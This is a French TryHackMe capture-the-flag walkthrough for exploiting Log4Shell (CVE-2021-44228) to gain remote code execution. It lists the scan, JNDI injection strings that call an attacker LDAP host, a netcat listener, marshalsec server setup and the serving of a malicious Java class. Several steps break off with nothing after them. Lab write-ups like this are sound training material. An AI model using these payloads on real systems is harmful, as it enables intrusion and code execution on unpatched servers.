
Procédure pas à pas TryHackMe pour l'exploitation de la vulnérabilité Log4Shell (CVE-2021-44228) afin d'obtenir une exécution de code à distance et de capturer des flags.
Plateforme : TryHackMe Difficulté : Moyenne Sujet : Log4Shell (Vulnérabilité Log4j)
Exploiter la vulnérabilité Log4j (CVE-2021-44228) pour obtenir une exécution de code à distance et capturer les flags.
nmap -sC -sV <TARGET_IP>
La vulnérabilité Log4j permet l'injection JNDI :
${jndi:ldap://<ATTACKER_IP>:1389/a}
Si l'entrée est enregistrée → la vulnérabilité existe.
nc -lvnp 4444
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package
Exécuter le serveur LDAP :
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389
python3 -m http.server 8000
Créer une classe Java malveillante (Exploit.class)
Injecter la charge utile dans le champ vulnérable :
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}
💡 Utiliser des en-têtes comme :
Une fois déclenché :
Vérifier :
sudo -l
Rechercher :
find / -name flag.txt 2>/dev/null
cat flag.txt